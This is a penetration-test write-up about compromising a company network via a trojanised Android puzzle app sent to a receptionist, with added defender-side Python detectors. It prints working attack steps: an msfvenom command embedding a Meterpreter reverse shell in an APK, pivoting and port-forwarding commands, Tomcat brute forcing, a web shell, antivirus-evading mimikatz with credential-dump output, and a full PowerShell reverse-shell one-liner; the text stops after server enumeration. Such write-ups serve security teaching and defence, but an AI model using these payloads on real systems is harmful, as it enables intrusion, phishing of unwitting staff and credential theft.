Company Smartphone Security (A) - From APK to Golden Ticket: Initial Probing, Getting Domain Admin Access from an Android Smartphone, and More ...

This article describes the potential dangers of using a personal smartphone in an enterprise network; the scenario is a typified version of a real-life case. It turns out that it is not difficult to trick an employee into installing a malicious application, bypass the network protections, reach the corporate network, escalate privileges and obtain confidential information.

It also turns out that all protection mechanisms (including anti-virus software) can be bypassed without being detected. An attacker can do this with some of the system's native tools and publicly available scripts, without relying much on external tooling.

This is what we often call the KISS strategy (Keep It Simple, Stupid).

Any resemblance between the following story and real events or real people is pure coincidence.

Background

Super Company hired our penetration testers to conduct a social engineering assessment of its staff, covering all the ways confidential information could be stolen so that employees

During the initial meeting we asked for access to the guest WiFi. The guest WiFi is protected: it requires a login, and the credentials are valid for one day only.

Once connected, we ran a quick scan with Fing from an iPhone and found several Android devices, clearly more than the number of visitors at the company. We assumed that company employees were also using the guest WiFi, perhaps to save their precious mobile data plans. In fact, the receptionist who gave us the login credentials was chatting on WhatsApp when we asked her how to get Internet access.

Scene: two phones on the desk, a tidy desktop, a photo of a family of three.

After a brief chat we learned that her daughter is four years old and very lively, but calms down as soon as she gets a smartphone with a game installed. Ah, kids these days ...

Attack description

The social engineering began with a small phishing campaign, which failed. We later found out that company staff had been trained shortly before our attack and were very wary of attachments, downloads and the like. Not a good start.

So we decided to focus on the receptionist. Our aim was to get her to download an Android application for children, and what could be more interesting for a child than a puzzle? Ha, we love jigsaw puzzles.

Finding the receptionist's email address was easy, and we sent her an email with a link to the download page. We also added a QR code to the mail, so she only had to scan it to install the app.

Very cute, right? Our goal was simply to get a malicious Android application installed: the app really is a jigsaw puzzle, but it hides a Meterpreter shell inside.

Aiming at the smartphone

Creating a malicious Android application is very simple: we downloaded a legitimate application and then used msfvenom to inject the payload, a Meterpreter shell (the LHOST value is redacted in the original):

msfvenom -x puzzle.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=443 -o /var/www/html/puzzle.apk

We chose to listen on port 443 because ports 443 and 80 are the standard ports that firewalls usually allow outbound.

We were confident the app would arouse enough interest in the receptionist for her to ignore the warnings during installation.

On our host we also started a listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit -j -z
[*] Started reverse TCP handler on :443

Since we were counting on company staff using the guest WiFi for personal purposes, we also placed an antenna near the company premises.

Using Meterpreter

At around 8:00 in the morning, msfconsole showed the message:

[*] Meterpreter session 1 opened (:443 -> XXXX:51990) at ...

Bingo! She had installed and run the malicious Android app, and we now had a Meterpreter session.

Now we needed to know whether she was connected to the company's WiFi network. A check of the IP showed that the connection came from the cellular network: she was probably on her way to the office, with her daughter playing the jigsaw puzzle.

The session did not last long; after a few minutes we lost the shell, but before 9:00 we received another session:

[*] Meterpreter session 2 opened (:443 -> KKKK:61545) at ...

This IP belonged to the company, meaning she was now connected to the company's WiFi network.

So we started some preliminary exploration. Apart from a few smartphones, we only found a DNS server, on a different subnet:

meterpreter > ipconfig
...
Interface  9
============
Name         : wlan0 - wlan0
Hardware MAC : 20:6e:9c:75:94:ba
IPv4 Address : 10.118.1.13
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::226e:9cff:fe75:94ba
IPv6 Netmask : ::
....

meterpreter > shell
Process 1 created.
Channel 1 created.
getprop net.dns1
192.168.178.196

The guest WiFi network is 10.118.1.0/24, and the DNS server is on another subnet.

To reach that subnet, we added a route through the Meterpreter session:

msf exploit(handler) > route add 192.168.178.0 255.255.255.0 1

Nmap cannot scan through the Meterpreter route directly, so we started a SOCKS proxy and did a quick ping scan through proxychains:

msf auxiliary(socks4a) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

# On the attacker machine, scanning the DNS server's network:
proxychains nmap -sn 192.168.178.0/24
Nmap scan report for 192.168.178.195
Host is up (0.15s latency).
Nmap scan report for 192.168.178.196
Host is up (0.22s latency).

These two hosts responded to the ping scan.

We then ran a quick TCP scan as well:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.178.195,196
msf auxiliary(tcp) > set RPORTS 1-1024
msf auxiliary(tcp) > run
[*] 192.168.178.195: - 192.168.178.195:80 - TCP OPEN
[*] 192.168.178.195: - 192.168.178.195:8080 - TCP OPEN
[*] 192.168.178.196: - 192.168.178.196:53 - TCP OPEN
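From the defender's side, every step above (the route, the ping sweep, the 1-1024 port scan) shows up as traffic from the guest subnet into the internal subnet, which the guest network policy should not permit at all. The following check over NetFlow-style records is an added example, not code from the article: it uses the article's two subnets, and the DNS allow-list, thresholds and flow records are constructed assumptions.

```python
"""Flag guest-WiFi clients reaching the internal subnet in NetFlow-style records.

Added example, not code from the original article. The subnets are the ones the
article reports (guest 10.118.1.0/24, internal 192.168.178.0/24); the allow-list,
the threshold and the flow records below are constructed assumptions.
"""
import ipaddress
from collections import defaultdict

GUEST_NET = ipaddress.ip_network("10.118.1.0/24")
INTERNAL_NET = ipaddress.ip_network("192.168.178.0/24")
# The only internal service a guest client legitimately needs: the DHCP-assigned DNS.
ALLOWED = {(ipaddress.ip_address("192.168.178.196"), 53)}
SCAN_PORT_THRESHOLD = 20  # distinct ports from one guest client to one internal host

def parse_flow(line):
    """Parse 'HH:MM:SS src_ip:src_port dst_ip:dst_port proto' into a dict."""
    ts, src, dst, proto = line.split()
    src_ip, _ = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "src": ipaddress.ip_address(src_ip),
            "dst": ipaddress.ip_address(dst_ip), "dport": int(dst_port), "proto": proto}

def analyse(lines):
    """Return (policy violations, (src, dst) pairs that look like a port sweep)."""
    violations = []
    ports_seen = defaultdict(set)
    for line in lines:
        f = parse_flow(line)
        if f["src"] not in GUEST_NET or f["dst"] not in INTERNAL_NET:
            continue  # guest -> Internet or internal -> internal: not this check's concern
        if (f["dst"], f["dport"]) in ALLOWED:
            continue
        violations.append((f["ts"], str(f["src"]), str(f["dst"]), f["dport"]))
        ports_seen[(str(f["src"]), str(f["dst"]))].add(f["dport"])
    sweeps = sorted(p for p, ports in ports_seen.items() if len(ports) >= SCAN_PORT_THRESHOLD)
    return violations, sweeps

# Constructed records mirroring the article: the phone resolves DNS, touches the
# intranet server's ports 80 and 8080, another guest browses the Internet, and
# then the phone sweeps TCP 1-1024 on the intranet server.
SAMPLE_FLOWS = [
    "08:41:02 10.118.1.13:51990 192.168.178.196:53 tcp",
    "08:41:05 10.118.1.13:41000 192.168.178.195:80 tcp",
    "08:41:05 10.118.1.13:41001 192.168.178.195:8080 tcp",
    "08:41:09 10.118.1.20:40210 198.51.100.7:443 tcp",
] + [f"08:42:{i % 60:02d} 10.118.1.13:{42000 + i} 192.168.178.195:{i} tcp"
     for i in range(1, 1025)]

if __name__ == "__main__":
    bad, sweeps = analyse(SAMPLE_FLOWS)
    print(f"{len(bad)} guest->internal flows outside policy; sweeps: {sweeps}")
```

With the policy enforced at the firewall the violation list should be empty; a non-empty list is itself the misconfiguration the article later discovers, independent of whether a sweep is detected.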

This was our picture of the network layout at that point:

Aiming at the intranet server

Host 192.168.178.195 had ports 80 and 8080 open, and we forwarded both ports to our machine so that we could analyze the traffic locally:

meterpreter > portfwd add -L 127.0.0.1 -l 8001 -r 192.168.178.195 -p 80
meterpreter > portfwd add -L 127.0.0.1 -l 8002 -r 192.168.178.195 -p 8080

Port 80 exposed the company's phone book; we still do not know why this information was exposed on the guest network.

A quick scan found no obvious vulnerabilities, so we moved on to port 8080.

There we met Apache Tomcat's basic authentication. We brute-forced it with Hydra, and a few minutes later we logged in with admin / password123456.

Now we were in the Tomcat admin console. This must be a firewall configuration error, because neither the Tomcat admin console nor the company directory should be exposed on the guest network.
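The Hydra run against basic authentication leaves a very recognisable trace: a burst of 401 responses from one client, followed by a 200 carrying an authenticated user. The detector below is an added example, not code from the article; it parses Tomcat's default common-log-format access log, and the log lines, client address (the phone's guest IP from the article), window and threshold are constructed assumptions.

```python
"""Spot a basic-auth brute force in a Tomcat access log (common log format).

Added example, not code from the original article. Log lines are constructed;
WINDOW and THRESHOLD are assumptions to tune per environment.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<req>[^"]*)" (?P<status>\d{3})')
WINDOW = timedelta(seconds=60)
THRESHOLD = 20  # 401 responses to one client inside WINDOW

def parse(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "user": m["user"], "ts": ts,
            "req": m["req"], "status": int(m["status"])}

def detect(lines):
    """Return alerts: ('bruteforce', ip, n) and ('success_after_bruteforce', ip, user)."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent 401s
    flagged = set()
    alerts = []
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        q = recent[e["ip"]]
        if e["status"] == 401:
            q.append(e["ts"])
            while q and e["ts"] - q[0] > WINDOW:   # slide the window
                q.popleft()
            if len(q) >= THRESHOLD and e["ip"] not in flagged:
                flagged.add(e["ip"])
                alerts.append(("bruteforce", e["ip"], len(q)))
        elif e["status"] == 200 and e["ip"] in flagged and e["user"] != "-":
            alerts.append(("success_after_bruteforce", e["ip"], e["user"]))
            flagged.discard(e["ip"])  # report the guessed password once per burst
    return alerts

def _line(sec, status, user="-"):
    """Build a constructed log line from the guest-WiFi phone against the manager app."""
    return (f'10.118.1.13 - {user} [17/Feb/2017:09:12:{sec:02d} +0100] '
            f'"GET /manager/html HTTP/1.1" {status} 2473')

# Constructed log: one legitimate admin login from the internal subnet, then
# 25 failed attempts from the phone within half a minute, then a successful login.
SAMPLE_LOG = (['192.168.178.10 - ops [17/Feb/2017:09:10:00 +0100] '
               '"GET /manager/html HTTP/1.1" 200 17522']
              + [_line(s, 401) for s in range(25)] + [_line(30, 200, "admin")])
```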

We planned to upload a shell to Tomcat so that we could interact with the underlying operating system. The server fingerprint showed that we were dealing with a Windows server.

We built a WAR archive from the Laudanum Injectable Web Exploit Code and uploaded it through the administration page. It contained:

cmd.jsp: used to interact with cmd.exe

m.ps1: an obfuscated, AV-evading mimikatz.ps1 for grabbing passwords and hashes

Thanks to the flexibility of PowerShell, obfuscating PowerShell scripts with a few well-known techniques is easy. We just changed some keywords, such as renaming Invoke-Mimikatz to Invoke-mymy, plus a few other tricks.

We also appended Invoke-mymy -dumpcreds at the end of the file so that the function runs as soon as the script is loaded.

After uploading, we opened cmd.jsp in the browser.

Ha! The web shell runs with SYSTEM privileges. We continued collecting information, starting with the environment variables:

cmd /c set

The result:

ALLUSERSPROFILE=C:\ProgramData
COMPUTERNAME=SRVINTRANET
USERDOMAIN=SUPERCOMPANY
USERNAME=SRVINTRANET$

Now we had the computer name, SRVINTRANET, and we knew it belonged to the SUPERCOMPANY domain. Perfect.

We continued with systeminfo to retrieve other useful information:

Command: systeminfo

Result:

Host Name:        SRVINTRANET
OS Name:          Microsoft Windows Server 2012 R2 Standard
OS Version:       6.3.9600 N/A Build 9600
OS Manufacturer:  Microsoft Corporation
OS Configuration: Member Server
OS Build Type:    Multiprocessor Free
Registered Owner: Windows User
...

Next, the domain controllers:

Command: cmd /c nltest /dclist:supercompany

Result:

Get list of DCs in domain 'supercompany' from '\\SRVDC1'.
    srvdc1.supercompany.local [PDC]  [DS] Site: Default-First-Site-Name
    srvdc2.supercompany.local        [DS] Site: Default-First-Site-Name
The command completed successfully

By this time the Android device was probably starting to heat up, and we needed to move to a more suitable shell; the Android device was no longer suitable for our work.

Our golden rule is: stay hidden and avoid anti-virus software. So we used a PowerShell-based shell, hoping that SRVINTRANET could reach the Internet.

Through the Tomcat web shell we launched a PowerShell back door that connects back with a one-liner, while our public server listened on port 80 with netcat (the server address is redacted in the original):

cmd /c powershell -nop -c "$c = New-Object Net.Sockets.TCPClient('', 80); $s = $c.GetStream(); [byte[]]$b = 0..65535 | %{0}; while(($i = $s.Read($b, 0, $b.Length)) -ne 0){; $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b, 0, $i); $sb = (IEX $d 2>&1 | Out-String); $sb2 = $sb + 'PS ' + (pwd).Path + '> '; $sb = ([text.encoding]::ASCII).GetBytes($sb2); $s.Write($sb, 0, $sb.Length); $s.Flush()}; $c.Close()"

What does this script do? When PowerShell starts, it creates a TCPClient object, connects back to our machine, opens an I/O stream, and uses Invoke-Expression to execute whatever it reads from the stream, writing the output (and a fake prompt) back to the same stream.
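The same properties that make this one-liner work (a TCPClient, raw stream I/O, Invoke-Expression on data read from the socket, output captured with Out-String) are exactly what a defender can look for in PowerShell script-block logs (event ID 4104), where the full command text is recorded even when launched with -nop. The scorer below is an added example, not code from the article; its indicator weights, threshold and the two sample script blocks are constructed assumptions.

```python
"""Score PowerShell script-block text (event ID 4104) for reverse-shell indicators.

Added example, not code from the original article. The indicators follow the
one-liner the article explains; weights, threshold and samples are assumptions.
"""
import re

# (regex, weight, label). A single indicator (e.g. TCPClient alone) is common in
# admin scripts, so only the combination is supposed to cross ALERT_THRESHOLD.
INDICATORS = [
    (r"Net\.Sockets\.TCPClient", 3, "outbound TCP client"),
    (r"\.GetStream\(\)", 1, "raw stream I/O"),
    (r"\b(IEX|Invoke-Expression)\b", 3, "dynamic code execution"),
    (r"2>&1\s*\|\s*Out-String", 2, "captures command output as text"),
    (r"-nop\b|-NoProfile\b", 1, "no-profile launch"),
]
ALERT_THRESHOLD = 7

def score_script_block(text):
    """Return (score, matched labels) for one script block's text."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            hits.append(label)
    return score, hits

def is_reverse_shell(text):
    """True when enough indicators co-occur to treat the block as a reverse shell."""
    return score_script_block(text)[0] >= ALERT_THRESHOLD

# Constructed samples. The first has the shape of the article's one-liner with a
# documentation-range address; the second is a benign port-reachability check
# that also uses TCPClient and must stay below the threshold.
SUSPICIOUS_BLOCK = ("$c = New-Object Net.Sockets.TCPClient('198.51.100.7', 80); "
                    "$s = $c.GetStream(); ... $sb = (IEX $d 2>&1 | Out-String); ...")
BENIGN_BLOCK = ("$c = New-Object Net.Sockets.TCPClient; $c.Connect('srvintranet', 8080); "
                "Write-Output $c.Connected; $c.Close()")

if __name__ == "__main__":
    for name, block in (("suspicious", SUSPICIOUS_BLOCK), ("benign", BENIGN_BLOCK)):
        print(name, score_script_block(block), is_reverse_shell(block))
```

Renaming functions, as the article does for mimikatz, does not help against this kind of check because the .NET type names and Invoke-Expression have to survive for the script to run.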

We were not so lucky this time: no reverse shell arrived. The server apparently could not reach the Internet, so we went back to the Tomcat web shell and ran the obfuscated mimikatz:

cmd /c powershell -executionpolicy bypass -f c:\tomcat\webapps\cmd\warfiles\m.ps1

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 191734 (00000000:0002ecf6)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SRVINTRANET
Logon Server      : SRVINTRANET
Logon Time        : 2/17/2017 2:12:31 PM
SID               : S-1-5-21-938204560-2839928776-2225904511-500
        msv :
         [00010000] CredentialKeys
         * NTLM     : 604603ab105adc8XXXXXXXXXXXXXXXXX
         * SHA1     : 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
         [00000003] Primary
         * Username : Administrator
         * Domain   : SRVINTRANET
         * NTLM     : 604603ab105adc8XXXXXXXXXXXXXXXXX
         * SHA1     : 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SRVINTRANET
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SRVINTRANET
         * Password : (null)
        ssp : KO
        credman :

mimikatz(powershell) # exit
Bye!

We got the local administrator's password hashes, but no plaintext. This is because our target server is Windows Server 2012, and things changed after Server 2008: WDigest no longer keeps plaintext passwords in memory (we cannot help missing the good old days), and credman was empty. Still, this finding is not bad.

We decided to look for a server with Internet access, because we were still pivoting through an unstable Android phone.

With the net view command we got a list of the servers sharing resources:

Server Name            Remark
-------------------------------------------
\\SRVDC1               Domain controller PDC
\\SRVDC2 [4]           Domain Controller
\\SRVWSUS              Server WSUS
\\SRVAV                Server AV
\\SRVFILE1             File Server

This was the real server network:
